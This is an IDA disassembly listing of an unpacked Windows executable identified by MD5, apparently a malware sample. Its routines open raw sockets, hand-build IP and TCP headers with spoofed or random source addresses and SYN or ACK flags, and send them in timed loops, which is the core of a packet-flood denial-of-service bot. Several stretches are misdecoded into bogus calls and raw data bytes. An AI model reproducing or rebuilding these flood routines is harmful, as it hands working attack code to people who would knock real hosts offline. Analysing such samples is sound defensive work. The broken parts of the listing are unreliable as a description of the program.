;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : BFBF44D429869925A74B313B279A2DDE
; File Name : u:\work\bfbf44d429869925a74b313b279a2dde_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 0001B000 ( 110592.)
; Section size in file : 0001B000 ( 110592.)
; Offset to raw data for section: 00001000
; Flags E0000040: Data Executable Readable Writable
; Alignment : default
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
seg000 segment para public 'CODE' use32
assume cs:seg000
;org 401000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
public start
start proc near ; DATA XREF: seg000:0040C3D4�o
var_494 = byte ptr -494h
var_294 = dword ptr -294h
var_290 = dword ptr -290h
var_28C = byte ptr -28Ch
var_20C = byte ptr -20Ch
var_18C = byte ptr -18Ch
var_10C = byte ptr -10Ch
var_8C = byte ptr -8Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 494h
mov eax, [ebp+arg_0]
push esi
push edi
mov ecx, 0A5h
mov esi, eax
lea edi, [ebp+var_294]
rep movsd
mov dword ptr [eax+290h], 1
call ds:dword_41C04C ; GetTickCount
push eax
call sub_41055D
lea eax, [ebp+var_18C]
push eax
lea eax, [ebp+var_8C]
push eax
lea eax, [ebp+var_20C]
push eax
lea eax, [ebp+var_28C]
push eax
call sub_4013E9
push eax
lea eax, [ebp+var_494]
push offset dword_41E040
push eax
call sub_41050B
xor esi, esi
add esp, 20h
cmp [ebp+var_8], esi
jnz short loc_401090
push esi
lea eax, [ebp+var_494]
push [ebp+var_C]
push eax
lea eax, [ebp+var_10C]
push eax
push [ebp+var_294]
call sub_40E367
add esp, 14h
loc_401090: ; CODE XREF: start+6E�j
lea eax, [ebp+var_494]
push eax
call sub_407E0E
push [ebp+var_290]
call sub_4102D3
pop ecx
pop ecx
push esi
call near ptr 3D0000h
sbb eax, 8B555E5Fh ; CODE XREF: sub_4013E9+40�p
start endp ; sp-analysis failed
in al, dx
sub esp, 284h
push ebx
push edi
push 0Eh
xor ebx, ebx
pop ecx
xor eax, eax
lea edi, [ebp-0B3h]
mov [ebp-0B4h], bl
rep stosd
stosw
stosb
lea eax, [ebp-284h]
push eax
push 202h
call ds:dword_430718
test eax, eax
jz short loc_4010F2
xor eax, eax
jmp loc_4013E5
; ---------------------------------------------------------------------------
loc_4010F2: ; CODE XREF: seg000:004010E9�j
push 1
pop edi
push edi
push ebx
push ebx
push 0FFh
push 3
push 2
call ds:dword_430834
cmp eax, 0FFFFFFFFh
mov [ebp-20h], eax
jz loc_4013DD
push esi
lea ecx, [ebp-40h]
push 4
push ecx
push 2
push ebx
push eax
mov [ebp-40h], edi
call ds:dword_430774
cmp eax, 0FFFFFFFFh
jz loc_4013D3
push dword ptr [ebp+14h]
mov word ptr [ebp-58h], 2
call ds:dword_430794
mov esi, [ebp+8]
push 28h
mov [ebp-56h], ax
mov [ebp-54h], esi
mov byte ptr [ebp-34h], 45h
call ds:dword_430794
push dword ptr [ebp+14h]
mov [ebp-32h], ax
mov [ebp-30h], di
mov [ebp-2Eh], bx
mov byte ptr [ebp-2Ch], 80h
mov byte ptr [ebp-2Bh], 6
mov [ebp-2Ah], bx
mov [ebp-24h], esi
call ds:dword_430794
mov [ebp-12h], ax
call sub_410567
movzx eax, ax
cdq
mov ecx, 401h
idiv ecx
push edx
call ds:dword_430794
push 12345678h
mov [ebp-14h], ax
call ds:dword_430790
push offset dword_41E0C8
mov [ebp-10h], eax
push dword ptr [ebp+10h]
call sub_410930
pop ecx
test eax, eax
pop ecx
jnz short loc_4011C2
mov [ebp-0Ch], ebx
mov byte ptr [ebp-7], 2
jmp short loc_401216
; ---------------------------------------------------------------------------
loc_4011C2: ; CODE XREF: seg000:004011B7�j
push offset dword_41E0BC
push dword ptr [ebp+10h]
call sub_410930
pop ecx
test eax, eax
pop ecx
jnz short loc_4011DE
mov [ebp-0Ch], ebx
mov byte ptr [ebp-7], 10h
jmp short loc_401216
; ---------------------------------------------------------------------------
loc_4011DE: ; CODE XREF: seg000:004011D3�j
push offset dword_41E0B0
push dword ptr [ebp+10h]
call sub_410930
pop ecx
test eax, eax
pop ecx
jnz short loc_401216
call sub_410567
push 3
cdq
pop ecx
idiv ecx
mov [ebp-0Ch], edx
call sub_410567
push 2
cdq
pop ecx
idiv ecx
neg edx
sbb dl, dl
and dl, 0Eh
add dl, cl
mov [ebp-7], dl
loc_401216: ; CODE XREF: seg000:004011C0�j
; seg000:004011DC�j ...
push 4000h
mov byte ptr [ebp-8], 50h
call ds:dword_430794
mov [ebp-6], ax
lea eax, [ebp-48h]
push eax
mov [ebp-2], bx
mov [ebp+10h], ebx
call near ptr 3D0000h
or byte ptr [ebp-17AF1BBBh], 0BDh
in eax, dx
cld
jmp fword ptr [edx]
; ---------------------------------------------------------------------------
dd 8BBC75FFh, 0FF991845h, 5052B875h, 0F76BE8h, 0E4450300h
dd 135E146Ah, 4589E855h, 0C85589C4h, 0FC5D8966h, 0F2FAE8h
dd 0E9B99900h, 0F7000003h, 0E8C281F9h, 52000003h, 79415FFh
dd 89660043h, 0DCE8EC45h, 8B0000F2h, 10E7C1F8h, 0F2D2E8h
dd 57F80B00h, 79415FFh, 0B70F0043h, 0F04589C0h, 0FF0C458Bh
dd 0FF500C45h, 43079015h, 0D8458900h, 56DC458Bh, 888C4589h
dd 45C6905Dh, 15FF0691h, 430794h, 92458966h, 89D8458Bh
dd 458D8845h, 50206A88h, 0FF4C858Dh, 0E850FFFFh, 0F30Ch
dd 56EC458Dh, 6C858D50h, 50FFFFFFh, 0F2FBE8h, 4C858D00h
dd 6AFFFFFFh, 8BE85034h, 66000061h, 8DFC4589h, 5056CC45h
dd 0FF4C858Dh, 0E850FFFFh, 0F2D8h, 56EC458Dh, 60858D50h
dd 50FFFFFFh, 0F2C7E8h, 8D046A00h, 0FFFF7485h, 0E85053FFh
dd 0F258h, 8D44C483h, 0FFFF4C85h, 50286AFFh, 6145E8h, 45896600h
dd 0CC458DD6h, 858D5056h, 0FFFFFF4Ch, 0F292E850h, 0C4830000h
dd 0A8458D14h, 5350106Ah, 0FF4C858Dh, 286AFFFFh, 0E075FF50h
dd 7F415FFh, 0F8830043h, 12874FFh, 458D1045h, 75E850E4h
dd 32FFFCECh, 3BE8458Bh, 3C7FC845h, 0FECA8C0Fh, 458BFFFFh
dd 0C4453BE4h, 0BDE92E73h, 0FFFFFFFEh, 43073015h, 858D5000h
dd 0FFFFFF0Ch, 41E07C68h, 4CE85000h, 8D0000F1h, 0FFFF0C85h
dd 43E850FFh, 8300006Ah, 3EB10C4h
; ---------------------------------------------------------------------------
mov ebx, [ebp+10h]
loc_4013D3: ; CODE XREF: seg000:0040112A�j
push dword ptr [ebp-20h]
call ds:dword_430828
pop esi
loc_4013DD: ; CODE XREF: seg000:0040110D�j
call ds:dword_430700
mov eax, ebx
loc_4013E5: ; CODE XREF: seg000:004010ED�j
pop edi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
sub_4013E9 proc near ; CODE XREF: start+4F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
push esi
push edi
push [esp+0Ch+arg_0]
call sub_40731F
push [esp+10h+arg_4]
mov esi, eax
call sub_410A7F
push [esp+14h+arg_C]
mov ebx, eax
call sub_410A7F
mov edi, eax
call sub_410567
cdq
mov ecx, 200h
push edi
idiv ecx
push ebx
push [esp+20h+arg_8]
lea eax, [edx+esi+100h]
push eax
push esi
call near ptr loc_4010AF+3
add esp, 20h
test eax, eax
jnz short loc_401438
push 1
pop eax
loc_401438: ; CODE XREF: sub_4013E9+4A�j
cdq
mov ecx, 3E8h
idiv ecx
cdq
idiv edi
pop edi
pop esi
pop ebx
retn
sub_4013E9 endp
; ---------------------------------------------------------------------------
loc_401447: ; DATA XREF: seg000:0040C5BC�o
push ebp
mov ebp, esp
sub esp, 3BCh
push ebx
push esi
mov eax, [ebp+8]
push edi
push 68h
mov esi, eax
pop ecx
lea edi, [ebp-1BCh]
push 1
pop ebx
push 0FFh
push 3
rep movsd
push 2
mov [eax+19Ch], ebx
call ds:dword_430810
cmp eax, 0FFFFFFFFh
mov [ebp-4], eax
jnz short loc_4014E2
call ds:dword_430730
push eax
lea eax, [ebp-3BCh]
push offset dword_41E21C
push eax
call sub_41050B
xor edi, edi
add esp, 0Ch
cmp [ebp-24h], edi
jnz short loc_4014C5
push edi
lea eax, [ebp-3BCh]
push dword ptr [ebp-28h]
push eax
lea eax, [ebp-0B8h]
push eax
push dword ptr [ebp-1BCh]
call sub_40E367
add esp, 14h
loc_4014C5: ; CODE XREF: seg000:004014A3�j
lea eax, [ebp-3BCh]
push eax
call sub_407E0E
push dword ptr [ebp-38h]
call sub_4102D3
pop ecx
pop ecx
push edi
call near ptr 3D0000h
outsd
loc_4014E2: ; CODE XREF: seg000:00401481�j
lea ecx, [ebp-0Ch]
push 4
loc_4014E7: ; CODE XREF: seg000:00401558�j
push ecx
xor edi, edi
push 2
push edi
push eax
mov [ebp-0Ch], ebx
call ds:dword_430774
cmp eax, 0FFFFFFFFh
jnz short near ptr loc_401558+1
call ds:dword_430730
push eax
lea eax, [ebp-3BCh]
push offset dword_41E1D0
push eax
call sub_41050B
add esp, 0Ch
cmp [ebp-24h], edi
jnz short loc_40153C
push edi
lea eax, [ebp-3BCh]
push dword ptr [ebp-28h]
push eax
lea eax, [ebp-0B8h]
push eax
push dword ptr [ebp-1BCh]
call sub_40E367
add esp, 14h
loc_40153C: ; CODE XREF: seg000:0040151A�j
lea eax, [ebp-3BCh]
push eax
call sub_407E0E
push dword ptr [ebp-38h]
call sub_4102D3
pop ecx
pop ecx
push edi
call near ptr 3D0000h
loc_401558: ; CODE XREF: seg000:004014FA�j
loope loc_4014E7
test [eax-2], ecx
; ---------------------------------------------------------------------------
db 2 dup(0FFh), 50h
dd 7D015FFh, 0F8830043h, 8D5575FFh, 0FFFC4485h, 0E19C68FFh
dd 0E8500041h, 0EF8Fh, 59DC7D39h, 57207559h, 0FC44858Dh
dd 75FFFFFFh, 858D50D8h, 0FFFFFF48h, 44B5FF50h, 0E8FFFFFEh
dd 0CDC7h, 8D14C483h, 0FFFC4485h, 5FE850FFh, 0FF000068h
dd 1CE8C875h, 590000EDh, 41E85759h, 4CFFFCEAh, 458D106Ah
dd 0E85057E4h, 0EFC4h, 660CC483h, 2E445C7h, 15FF5700h
dd 430794h, 0E6458966h, 0FE48858Dh, 0FF50FFFFh, 4307D015h
dd 4C358B00h, 890041C0h, 7D89E845h, 89D6FF08h, 0D6FFF845h
dd 33F8452Bh, 3E8B9D2h, 0F1F70000h, 0FD0453Bh, 19487h
dd 41C6800h, 5C60000h, 42EFB8h, 9415FF45h, 39004307h, 0A366D47Dh
dd 42EFBAh, 0BC1D8966h, 660042EFh, 0EFBE3D89h, 5C60042h
dd 42EFC0h, 0C11D8880h, 660042EFh, 0EFC23D89h, 30740042h
dd 0EF0EE8h, 0C1D88B00h, 4E808E3h, 30000EFh, 8E3C1D8h
dd 0EEFAE8h, 0C1D80300h, 0F0E808E3h, 30000EEh, 89016AD8h
dd 42EFC41Dh, 18EB5B00h, 0FE44B5FFh, 0A6E8FFFFh, 5900005Dh
dd 0D015FF50h, 0A3004307h, 42EFC4h, 0A3E8458Bh, 42EFC8h
dd 0EEBEE8h, 0B99900h, 0F7000001h, 0CC1588F9h, 0E80042EFh
dd 0EEABh, 100B999h, 0F9F70000h, 0EFCD1588h, 98E80042h
dd 990000EEh, 0F0B9h, 4006800h, 0F9F70000h, 0CE3D8966h
dd 660042EFh, 0EFD21D89h, 66420042h, 0EFD01589h, 70E80042h
dd 990000EEh, 0FFB9h, 52F9F700h, 42EFD468h, 0EE86E800h
dd 0C4830000h, 0E4458D0Ch, 5750106Ah, 41C68h, 0EFB86800h
dd 75FF0042h, 0F415FFFCh, 83004307h, 874FFF8h, 0E90845FFh
dd 0FFFFFECAh, 0FFFC75FFh, 43082815h, 3015FF00h, 50004307h
dd 0FE48858Dh, 75FFFFFFh, 38685008h, 8D0041E1h, 0FFFC4485h
dd 20068FFh, 0E8500000h, 0F326h, 3918C483h, 2075DC7Dh
dd 44858D57h, 0FFFFFFFCh, 8D50D875h, 0FFFF4885h, 0B5FF50FFh
dd 0FFFFFE44h, 0CBDEE8h, 14C48300h, 0FC44858Dh, 0E850FFFFh
dd 6676h, 0E8C875FFh, 0EB33h, 0E8575959h, 0FFFCE858h, 0FC75FF13h
dd 82815FFh, 458B0043h, 6BD23308h, 0C88B3CC0h, 0F70AE8C1h
dd 0E9C1D075h, 8D505114h, 0FFFE4885h, 875FFFFh, 0C8858D50h
dd 50FFFFFEh, 0FC44858Dh, 0D468FFFFh, 500041E0h, 0ED22E8h
dd 1CC48300h, 75DC7D39h, 858D5720h, 0FFFFFC44h, 50D875FFh
dd 0FF48858Dh, 0FF50FFFFh, 0FFFE44B5h, 0CB59E8FFh, 0C4830000h
dd 44858D14h, 50FFFFFCh, 65F1E8h, 0C875FF00h, 0EAAEE8h
dd 57595900h, 0FCE7D3E8h
db 0FFh, 0ECh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40182E proc near ; DATA XREF: seg000:0040C2C5�o
var_414 = byte ptr -414h
var_214 = dword ptr -214h
var_210 = byte ptr -210h
var_190 = byte ptr -190h
var_110 = byte ptr -110h
var_90 = byte ptr -90h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 414h
mov eax, [ebp+arg_0]
push esi
push edi
mov ecx, 85h
mov esi, eax
lea edi, [ebp+var_214]
rep movsd
mov dword ptr [eax+210h], 1
lea eax, [ebp+var_110]
push eax
lea eax, [ebp+var_190]
push eax
lea eax, [ebp+var_210]
push eax
call sub_401B7C
push eax
lea eax, [ebp+var_414]
push offset dword_41E264
push eax
call sub_41050B
xor esi, esi
add esp, 18h
cmp [ebp+var_8], esi
jnz short loc_4018AB
push esi
lea eax, [ebp+var_414]
push [ebp+var_C]
push eax
lea eax, [ebp+var_90]
push eax
push [ebp+var_214]
call sub_40E367
add esp, 14h
loc_4018AB: ; CODE XREF: sub_40182E+5B�j
lea eax, [ebp+var_414]
push eax
call sub_407E0E
push [ebp+var_10]
call sub_4102D3
pop ecx
pop ecx
push esi
call near ptr 3D0000h
jl short near ptr loc_401925+3
pop esi
sub_40182E endp ; sp-analysis failed
loc_4018CA: ; CODE XREF: sub_401B7C+3C�p
push ebp
mov ebp, esp
sub esp, 284h
push ebx
push edi
push 0Eh
xor ebx, ebx
pop ecx
xor eax, eax
lea edi, [ebp-0B3h]
mov [ebp-0B4h], bl
rep stosd
stosw
stosb
lea eax, [ebp-284h]
push eax
push 202h
call ds:dword_430718
test eax, eax
jz short loc_40190A
xor eax, eax
jmp loc_401B78
; ---------------------------------------------------------------------------
loc_40190A: ; CODE XREF: seg000:00401901�j
push 1
pop edi
push edi
push ebx
push ebx
push 0FFh
push 3
push 2
call ds:dword_430834
cmp eax, 0FFFFFFFFh
mov [ebp-0Ch], eax
loc_401925: ; CODE XREF: sub_40182E+99�j
jz loc_401B70
push esi
lea ecx, [ebp-38h]
push 4
push ecx
push 2
push ebx
push eax
mov [ebp-38h], edi
call ds:dword_430774
cmp eax, 0FFFFFFFFh
jz loc_401B66
push 10h
lea eax, [ebp-50h]
push ebx
push eax
call sub_410590
add esp, 0Ch
mov word ptr [ebp-50h], 2
loc_40195D: ; CODE XREF: seg000:004019CE�j
push dword ptr [ebp+10h]
call ds:dword_430794
mov esi, [ebp+8]
push 28h
mov [ebp-4Eh], ax
mov [ebp-4Ch], esi
mov byte ptr [ebp-20h], 45h
call ds:dword_430794
push dword ptr [ebp+10h]
mov [ebp-1Eh], ax
mov [ebp-1Ch], di
mov [ebp-1Ah], bx
mov byte ptr [ebp-18h], 80h
mov byte ptr [ebp-17h], 6
mov [ebp-16h], bx
mov [ebp-10h], esi
call ds:dword_430794
push 4000h
mov [ebp-32h], ax
mov [ebp-2Ch], ebx
mov byte ptr [ebp-28h], 50h
mov byte ptr [ebp-27h], 2
call ds:dword_430794
mov [ebp-26h], ax
lea eax, [ebp-40h]
push eax
mov [ebp-22h], bx
mov [ebp+10h], ebx
call near ptr 3D0000h
jz short loc_40195D
inc ebp
clc
push eax
call near ptr 3D0000h
xchg eax, esi
push dword ptr [ebp-3Ch]
mov eax, [ebp+14h]
cdq
push dword ptr [ebp-40h]
push edx
push eax
call sub_4109C0
add eax, [ebp-8]
mov esi, edx
adc esi, [ebp-4]
mov [ebp-58h], eax
loc_4019F5: ; CODE XREF: seg000:00401B34�j
mov [ebp-24h], bx
call sub_410567
cdq
mov ecx, 3E9h
idiv ecx
add edx, 3E8h
push edx
call ds:dword_430794
mov [ebp-34h], ax
call sub_410567
mov edi, eax
shl edi, 10h
call sub_410567
or edi, eax
push edi
call ds:dword_430794
movzx eax, ax
mov [ebp-30h], eax
mov eax, [ebp+0Ch]
inc dword ptr [ebp+0Ch]
push eax
call ds:dword_430790
push 14h
mov [ebp-14h], eax
mov eax, [ebp-10h]
pop edi
push edi
mov [ebp-74h], eax
mov [ebp-70h], bl
mov byte ptr [ebp-6Fh], 6
call ds:dword_430794
mov [ebp-6Eh], ax
mov eax, [ebp-14h]
mov [ebp-78h], eax
lea eax, [ebp-78h]
push 20h
push eax
lea eax, [ebp-0B4h]
push eax
call sub_4105F0
lea eax, [ebp-34h]
push edi
push eax
lea eax, [ebp-94h]
push eax
call sub_4105F0
lea eax, [ebp-0B4h]
push 34h
push eax
call sub_40748E
mov [ebp-24h], ax
lea eax, [ebp-20h]
push edi
push eax
lea eax, [ebp-0B4h]
push eax
call sub_4105F0
lea eax, [ebp-34h]
push edi
push eax
lea eax, [ebp-0A0h]
push eax
call sub_4105F0
push 4
lea eax, [ebp-8Ch]
push ebx
push eax
call sub_410590
add esp, 44h
lea eax, [ebp-0B4h]
push 28h
push eax
call sub_40748E
mov [ebp-16h], ax
lea eax, [ebp-20h]
push edi
push eax
lea eax, [ebp-0B4h]
push eax
call sub_4105F0
add esp, 14h
lea eax, [ebp-50h]
push 10h
push eax
push ebx
lea eax, [ebp-0B4h]
push 28h
push eax
push dword ptr [ebp-0Ch]
call ds:dword_4307F4
cmp eax, 0FFFFFFFFh
jz short loc_401B3A
add [ebp+10h], eax
lea eax, [ebp-8]
push eax
call near ptr 3D0000h
mov eax, ds:3BFC458Bh
mov byte ptr [edi+3Ch], 0Fh
mov eax, cs
; ---------------------------------------------------------------------------
dw 0FFFEh
; ---------------------------------------------------------------------------
dec dword ptr [ebx+453BF845h]
test al, 73h
db 2Eh
jmp loc_4019F5
; ---------------------------------------------------------------------------
loc_401B3A: ; CODE XREF: seg000:00401B11�j
call ds:dword_430730
push eax
lea eax, [ebp-0F4h]
push offset dword_41E2A0
push eax
call sub_41050B
lea eax, [ebp-0F4h]
push eax
call sub_407E0E
add esp, 10h
jmp short loc_401B66
; ---------------------------------------------------------------------------
mov ebx, [ebp+10h]
loc_401B66: ; CODE XREF: seg000:00401942�j
; seg000:00401B61�j
push dword ptr [ebp-0Ch]
call ds:dword_430828
pop esi
loc_401B70: ; CODE XREF: seg000:loc_401925�j
call ds:dword_430700
mov eax, ebx
loc_401B78: ; CODE XREF: seg000:00401905�j
pop edi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
sub_401B7C proc near ; CODE XREF: sub_40182E+3C�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
push esi
push edi
push [esp+0Ch+arg_0]
call sub_40731F
push [esp+10h+arg_4]
mov esi, eax
call sub_410A7F
push [esp+14h+arg_8]
mov ebx, eax
call sub_410A7F
mov edi, eax
call sub_410567
cdq
mov ecx, 200h
push edi
idiv ecx
push ebx
lea eax, [edx+esi+100h]
push eax
push esi
call loc_4018CA
add esp, 1Ch
test eax, eax
jnz short loc_401BC7
push 1
pop eax
loc_401BC7: ; CODE XREF: sub_401B7C+46�j
cdq
mov ecx, 3E8h
idiv ecx
cdq
idiv edi
pop edi
pop esi
pop ebx
retn
sub_401B7C endp
; ---------------------------------------------------------------------------
loc_401BD6: ; DATA XREF: seg000:0040B70E�o
push ebp
mov ebp, esp
sub esp, 440h
mov eax, [ebp+8]
push ebx
push esi
push edi
push 68h
mov esi, eax
pop ecx
lea edi, [ebp-240h]
rep movsd
push 1
xor ebx, ebx
pop esi
lea edi, [ebp-9Fh]
push 0Eh
mov [eax+19Ch], esi
pop ecx
xor eax, eax
mov [ebp-0A0h], bl
rep stosd
stosw
stosb
mov edi, ds:dword_41C04C
call edi ; GetTickCount
push eax
call sub_41055D
pop ecx
push 0FFh
push 3
push 2
call ds:dword_430810
cmp eax, 0FFFFFFFFh
mov [ebp-4], eax
jnz short near ptr loc_401C9E+1
call ds:dword_430730
push eax
lea eax, [ebp-440h]
push offset dword_41E428
push eax
call sub_41050B
add esp, 0Ch
cmp [ebp-0A8h], ebx
jnz short loc_401C7F
push ebx
lea eax, [ebp-440h]
push dword ptr [ebp-0ACh]
push eax
lea eax, [ebp-13Ch]
push eax
push dword ptr [ebp-240h]
call sub_40E367
add esp, 14h
loc_401C7F: ; CODE XREF: seg000:00401C5A�j
lea eax, [ebp-440h]
push eax
call sub_407E0E
push dword ptr [ebp-0BCh]
call sub_4102D3
pop ecx
pop ecx
push ebx
call near ptr 3D0000h
loc_401C9E: ; CODE XREF: seg000:00401C37�j
mov eax, 6ACC4D8Dh
add al, 51h
push 2
push ebx
push eax
mov [ebp-34h], esi
call ds:dword_430774
cmp eax, 0FFFFFFFFh
jnz short near ptr loc_401D1C+1
call ds:dword_430730
push eax
lea eax, [ebp-440h]
push offset dword_41E3DC
push eax
call sub_41050B
add esp, 0Ch
cmp [ebp-0A8h], ebx
jnz short loc_401CFD
push ebx
lea eax, [ebp-440h]
push dword ptr [ebp-0ACh]
push eax
lea eax, [ebp-13Ch]
push eax
push dword ptr [ebp-240h]
call sub_40E367
add esp, 14h
loc_401CFD: ; CODE XREF: seg000:00401CD8�j
lea eax, [ebp-440h]
push eax
call sub_407E0E
push dword ptr [ebp-0BCh]
call sub_4102D3
pop ecx
pop ecx
push ebx
call near ptr 3D0000h
loc_401D1C: ; CODE XREF: seg000:00401CB5�j
and [ebp-23B7Bh], ecx
call dword ptr [eax-1]
adc eax, offset dword_4307D0
cmp eax, 0FFFFFFFFh
jnz short loc_401D8D
lea eax, [ebp-440h]
push offset dword_41E3A8
push eax
call sub_41050B
cmp [ebp-0A8h], ebx
pop ecx
pop ecx
jnz short loc_401D6D
push ebx
lea eax, [ebp-440h]
push dword ptr [ebp-0ACh]
push eax
lea eax, [ebp-13Ch]
push eax
push dword ptr [ebp-240h]
call sub_40E367
add esp, 14h
loc_401D6D: ; CODE XREF: seg000:00401D48�j
lea eax, [ebp-440h]
push eax
call sub_407E0E
push dword ptr [ebp-0BCh]
call sub_4102D3
pop ecx
pop ecx
push ebx
call near ptr 3D0000h
aas
loc_401D8D: ; CODE XREF: seg000:00401D2D�j
push 10h
lea eax, [ebp-44h]
push ebx
push eax
call sub_410590
add esp, 0Ch
mov word ptr [ebp-44h], 2
push ebx
call ds:dword_430794
mov [ebp-42h], ax
lea eax, [ebp-23Ch]
push eax
call ds:dword_4307D0
mov [ebp-40h], eax
mov [ebp+8], ebx
call edi ; GetTickCount
mov [ebp-30h], eax
loc_401DC5: ; CODE XREF: seg000:00402006�j
call edi ; GetTickCount
sub eax, [ebp-30h]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp-0B4h]
ja near ptr loc_402088+1
push 28h
mov byte ptr [ebp-2Ch], 45h
call ds:dword_430794
cmp [ebp-0B0h], ebx
mov [ebp-2Ah], ax
mov [ebp-28h], si
mov [ebp-26h], bx
mov byte ptr [ebp-24h], 80h
mov byte ptr [ebp-23h], 6
mov [ebp-22h], bx
jz short loc_401E38
call sub_410567
mov esi, eax
shl esi, 8
call sub_410567
add esi, eax
shl esi, 8
call sub_410567
add esi, eax
shl esi, 8
call sub_410567
add esi, eax
push 1
mov [ebp-20h], esi
pop esi
jmp short loc_401E4E
; ---------------------------------------------------------------------------
loc_401E38: ; CODE XREF: seg000:00401E09�j
push dword ptr [ebp-240h]
call sub_407435
pop ecx
push eax
call ds:dword_4307D0
mov [ebp-20h], eax
loc_401E4E: ; CODE XREF: seg000:00401E36�j
mov eax, [ebp-40h]
cmp [ebp-0B8h], ebx
mov [ebp-1Ch], eax
jnz short loc_401E6C
call sub_410567
cdq
mov ecx, 401h
idiv ecx
push edx
jmp short loc_401E72
; ---------------------------------------------------------------------------
loc_401E6C: ; CODE XREF: seg000:00401E5A�j
push dword ptr [ebp-0B8h]
loc_401E72: ; CODE XREF: seg000:00401E6A�j
call ds:dword_430794
mov [ebp-16h], ax
call sub_410567
cdq
mov ecx, 401h
idiv ecx
push edx
call ds:dword_430794
push 12345678h
mov [ebp-18h], ax
call ds:dword_430790
mov [ebp-14h], eax
lea eax, [ebp-1BCh]
push offset dword_41E3A4
push eax
call sub_410AE0
pop ecx
test eax, eax
pop ecx
jz short loc_401EC2
mov [ebp-10h], ebx
mov byte ptr [ebp-0Bh], 2
jmp short loc_401F1E
; ---------------------------------------------------------------------------
loc_401EC2: ; CODE XREF: seg000:00401EB7�j
lea eax, [ebp-1BCh]
push offset dword_41E3A0
push eax
call sub_410AE0
pop ecx
test eax, eax
pop ecx
jz short loc_401EE2
mov [ebp-10h], ebx
mov byte ptr [ebp-0Bh], 10h
jmp short loc_401F1E
; ---------------------------------------------------------------------------
loc_401EE2: ; CODE XREF: seg000:00401ED7�j
lea eax, [ebp-1BCh]
push offset dword_41E398
push eax
call sub_410AE0
pop ecx
test eax, eax
pop ecx
jz short loc_401F1E
call sub_410567
push 3
cdq
pop ecx
idiv ecx
mov [ebp-10h], edx
call sub_410567
push 2
cdq
pop ecx
idiv ecx
neg edx
sbb dl, dl
and dl, 0Eh
add dl, cl
mov [ebp-0Bh], dl
loc_401F1E: ; CODE XREF: seg000:00401EC0�j
; seg000:00401EE0�j ...
push 200h
mov byte ptr [ebp-0Ch], 50h
call ds:dword_430794
mov [ebp-0Ah], ax
mov eax, [ebp-20h]
mov [ebp-64h], eax
mov eax, [ebp-1Ch]
push 14h
mov [ebp-6], bx
mov [ebp-8], bx
mov [ebp-60h], eax
mov [ebp-5Ch], bl
mov byte ptr [ebp-5Bh], 6
call ds:dword_430794
mov [ebp-5Ah], ax
lea eax, [ebp-64h]
push 20h
push eax
lea eax, [ebp-0A0h]
push eax
call sub_4105F0
lea eax, [ebp-18h]
push 14h
push eax
lea eax, [ebp-80h]
push eax
call sub_4105F0
lea eax, [ebp-0A0h]
push 34h
push eax
call sub_40748E
mov [ebp-8], ax
lea eax, [ebp-2Ch]
push 14h
push eax
lea eax, [ebp-0A0h]
push eax
call sub_4105F0
lea eax, [ebp-18h]
push 14h
push eax
lea eax, [ebp-8Ch]
push eax
call sub_4105F0
push 4
lea eax, [ebp-78h]
push ebx
push eax
call sub_410590
add esp, 44h
lea eax, [ebp-0A0h]
push 28h
push eax
call sub_40748E
mov [ebp-22h], ax
lea eax, [ebp-2Ch]
push 14h
push eax
lea eax, [ebp-0A0h]
push eax
call sub_4105F0
add esp, 14h
lea eax, [ebp-44h]
push 10h
push eax
push ebx
lea eax, [ebp-0A0h]
push 3Ch
push eax
push dword ptr [ebp-4]
call ds:dword_4307F4
cmp eax, 0FFFFFFFFh
jz short loc_40200B
inc dword ptr [ebp+8]
jmp loc_401DC5
; ---------------------------------------------------------------------------
loc_40200B: ; CODE XREF: seg000:00402001�j
push dword ptr [ebp-4]
call ds:dword_430828
call ds:dword_430730
push eax
lea eax, [ebp-23Ch]
push dword ptr [ebp+8]
push eax
push offset dword_41E334
lea eax, [ebp-440h]
push 200h
push eax
call sub_410A8A
add esp, 18h
cmp [ebp-0A8h], ebx
jnz short loc_402069
push ebx
lea eax, [ebp-440h]
push dword ptr [ebp-0ACh]
push eax
lea eax, [ebp-13Ch]
push eax
push dword ptr [ebp-240h]
call sub_40E367
add esp, 14h
loc_402069: ; CODE XREF: seg000:00402044�j
lea eax, [ebp-440h]
push eax
call sub_407E0E
push dword ptr [ebp-0BCh]
call sub_4102D3
pop ecx
pop ecx
push ebx
call near ptr 3D0000h
loc_402088: ; CODE XREF: seg000:0040208A�j
; seg000:00401DD9�j
and al, 0FFh
jnz short loc_402088
call ds:dword_430828
mov eax, [ebp+8]
xor edx, edx
imul eax, 3Ch
mov ecx, eax
shr eax, 0Ah
div dword ptr [ebp-0B4h]
shr ecx, 14h
push ecx
push eax
lea eax, [ebp-23Ch]
push dword ptr [ebp+8]
push eax
lea eax, [ebp-1BCh]
push eax
lea eax, [ebp-440h]
push offset dword_41E2D0
push eax
call sub_41050B
add esp, 1Ch
cmp [ebp-0A8h], ebx
jnz short loc_4020FA
push ebx
lea eax, [ebp-440h]
push dword ptr [ebp-0ACh]
push eax
